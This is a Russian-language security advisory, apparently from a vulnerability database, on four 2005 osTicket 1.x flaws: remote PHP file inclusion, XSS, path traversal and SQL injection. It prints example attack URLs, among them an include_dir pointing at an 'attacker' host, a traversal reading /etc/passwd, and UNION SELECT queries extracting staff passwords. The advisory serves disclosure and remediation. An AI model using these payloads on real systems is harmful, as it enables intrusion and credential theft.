Множественные уязвимости в osTicket

Дата публикации:
06.05.2005
Дата изменения:
24.03.2009
Всего просмотров:
2436
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-1436
CVE-2005-1437
CVE-2005-1438
CVE-2005-1439
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
osTicket 1.x
Уязвимые версии: osTicket

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный php сценарий, произвести XSS нападение, просмотреть файлы на системе и выполнить произвольные SQL команды в базе данных приложения.

1. PHP инклюдинг возможен при включенных инклюдах и глобальных переменных в конфигурационном файле php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/include/main.php?config[search_disp]=true&include_dir=http://attacker

2. Межсайтовый скриптинг возможен из-за некорректной обработки входных данных в нескольких параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/view.php?e=test@test.com&t=480826[XSS]
http://[target]/include/header.php?osticket_title=%3C/title%3E[XSS]
h ttp://[target]/include/admin_login.php?em=asdf[XSS]
http://[target]/include/user_login.php?e=asdf[XSS]
http://[target]/include/open_submit.php?err=[XSS]

3. Уязвимость существует в сценарии 'attachments.php' при включенной опции загрузки файлов на сервер. Удаленный пользователь может просмотреть произвольные файлы на системе. Пример:

http://[target]/attachments.php?file=../../../../../../.. /etc/passwd

4. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Примеры:

http://[target]/admin.php?a=view&id=-99%20UNION
%20SELECT%20username, password,0,0,0,0,0,0,0,
0,0%20FROM%20ticket_reps%20WHERE%201/*

http://[target ]/admin.php?a=view&id=-99%20UNION
%20SELECT%20username, password,'your@email.org'
,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*

http://[target]/view.php?s=advanced &query=&cat=-99
%20UNION%20SELECT %2031337,0,0,0,password
%20FROM%20ticket_reps%20WHERE%20ID=5/*&
status=& sort=ID&way=ASC&per=5&search_submit=Search

URL производителей: www.osticket.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Multiple Vulnerabilities In osTicket

или введите имя

CAPTCHA